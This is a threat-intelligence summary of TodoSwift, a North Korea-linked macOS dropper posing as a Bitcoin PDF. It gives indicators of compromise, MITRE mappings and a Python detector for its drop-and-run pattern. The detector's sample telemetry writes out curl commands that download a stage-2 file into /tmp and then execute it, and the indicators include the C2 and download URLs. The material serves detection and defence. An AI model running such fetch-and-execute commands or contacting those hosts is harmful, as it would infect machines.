TodoSwift Conceals Malware Download Within Bitcoin PDF

TodoSwift is a macOS malware dropper linked to North Korea’s BlueNoroff, disguising itself as a legitimate PDF downloader to fetch and execute a malicious stage-2 binary. The analysis details its use of Google Drive links, NSTask-based curl commands, and a signed TodoTasks bundle to drop and run payloads. #TodoSwift #BlueNoroff #KandyKorn #RustBucket #DPRK #macOS

Keypoints

  • A signed file named TodoTasks was uploaded to VirusTotal on July 24, 2024.
  • TodoSwift is suspected to be associated with North Korean malware, particularly BlueNoroff (DPRK).
  • The dropper is a GUI application written in Swift/SwiftUI that masquerades as a PDF downloader.
  • The malware downloads and executes a stage 2 binary while presenting a PDF to the user.
  • Uses Google Drive for downloads, consistent with prior DPRK malware behaviors.
  • Employs NSTask to run curl commands to fetch malicious payloads, then launches the stage 2 binary with specific arguments.
  • IOCs include SHA-256 hashes of analyzed files and various file paths and signing details.
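The drop-and-run sequence in the keypoints (an app-bundle process spawning curl to write into /tmp, then executing the dropped file) can be detected with a small correlation over process-exec telemetry. The following is an added example and not code from the Kandji analysis; the event records are constructed, their field names are assumptions, and the stage-2 Google Drive file id is a placeholder because the page lists only one download id.

```python
import os
from collections import defaultdict

# Constructed sample process-exec telemetry (not real logs): field names are
# assumptions, values follow the IOCs above; the stage-2 Drive id is a placeholder.
APP = ("/Applications/Risk factors for Bitcoin’s price decline are "
       "emerging(2024).app/Contents/MacOS/TodoTasks")
DRIVE = "https://drive.usercontent.google.com/download?id="
SAMPLE_EVENTS = [
    {"ts": 100, "pid": 5001, "ppid": 1, "exe": APP, "args": [APP]},
    {"ts": 101, "pid": 5002, "ppid": 5001, "exe": "/usr/bin/curl",
     "args": ["curl", "-L", "-o", "/tmp/GoogleMsgStatus.pdf",
              DRIVE + "1xflBpAVQrwIS3UQqynb8iEj6gaCIXczo"]},
    {"ts": 102, "pid": 5003, "ppid": 5001, "exe": "/usr/bin/open",
     "args": ["open", "/tmp/GoogleMsgStatus.pdf"]},  # decoy PDF shown to the user
    {"ts": 103, "pid": 5004, "ppid": 5001, "exe": "/usr/bin/curl",
     "args": ["curl", "-L", "-o", "/tmp/NetMsgStatus", DRIVE + "STAGE2-ID"]},
    {"ts": 104, "pid": 5005, "ppid": 5001, "exe": "/tmp/NetMsgStatus",
     "args": ["/tmp/NetMsgStatus"]},  # stage 2 launched (its arguments omitted)
    {"ts": 200, "pid": 6001, "ppid": 1, "args": [],
     "exe": "/Applications/Safari.app/Contents/MacOS/Safari"},
    {"ts": 201, "pid": 6002, "ppid": 6001, "exe": "/usr/bin/curl",
     "args": ["curl", "-o", "/tmp/notes.txt", "https://example.com/"]},
]

def curl_output_path(args):
    """Return the file curl was told to write with -o/--output, else None."""
    for i, a in enumerate(args):
        if a in ("-o", "--output") and i + 1 < len(args):
            return args[i + 1]
    return None

def detect_drop_and_run(events, window=300):
    """Flag an app-bundle process that curls a file into /tmp and then execs it."""
    by_pid = {e["pid"]: e for e in events}
    dropped = defaultdict(dict)  # parent pid -> {path curl wrote: timestamp}
    alerts = []
    for e in sorted(events, key=lambda x: x["ts"]):
        parent = by_pid.get(e["ppid"])
        if parent is None or "/Contents/MacOS/" not in parent["exe"]:
            continue  # only GUI app bundles spawning children interest us here
        if os.path.basename(e["exe"]) == "curl":
            out = curl_output_path(e["args"])
            if out and out.startswith("/tmp/"):
                dropped[parent["pid"]][out] = e["ts"]
        elif e["exe"].startswith("/tmp/"):
            t0 = dropped[parent["pid"]].get(e["exe"])
            if t0 is not None and e["ts"] - t0 <= window:
                alerts.append({"parent": parent["exe"], "stage2": e["exe"]})
    return alerts
```

Only the TodoTasks parent trips the rule: the decoy PDF is opened but never executed, and the Safari download in the sample is written to /tmp but not run.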

MITRE Techniques

  • [T1071] Command and Control – "Uses HTTP/HTTPS for communication with the command-and-control server."
  • [T1203] Execution – "Executes malicious payloads through user interaction with the application."
  • [T1547] Persistence – "Installs itself in a way that allows it to run on system startup."
  • [T1027] Defense Evasion – "Obfuscates its malicious behavior by disguising as a legitimate application."

Indicators of Compromise

  • SHA-256 hashes – f1b3ce96462027644f9caa314d3da745dab139ee1cb14fe508234e76bd686f93, 9623c98f7338d56b07b35cd379e31e685e32a9c5317d7bc4af5276916cef4ed3, and other hashes
  • Files/Executables – TodoTasks, TodoTasksDocument
  • Dropped files – /tmp/GoogleMsgStatus.pdf, /tmp/NetMsgStatus
  • Download URL – hxxps[:]//drive[.]usercontent[.]google[.]com/download?id=1xflBpAVQrwIS3UQqynb8iEj6gaCIXczo
  • C2 – hxxp[:]//buy2x[.]com/OcMySY5QNkY/ABcTDInKWw/4SqSYtx%2B/EKfP7saoiP/BcA%3D%3D
  • Code signature – Identity: MasaMatsu.TodoTasks; Authority: Leap World Hongkong Limited (TL684RWA2X)
  • Certificate – Authority: Apple Root CA
  • Decoy PDF – GoogleMsgStatus.pdf
  • Bundle path – Risk factors for Bitcoin’s price decline are emerging(2024).app/Contents/MacOS/TodoTasks

Read more: https://www.kandji.io/blog/todoswift-disguises-malware-download-behind-bitcoin-pdf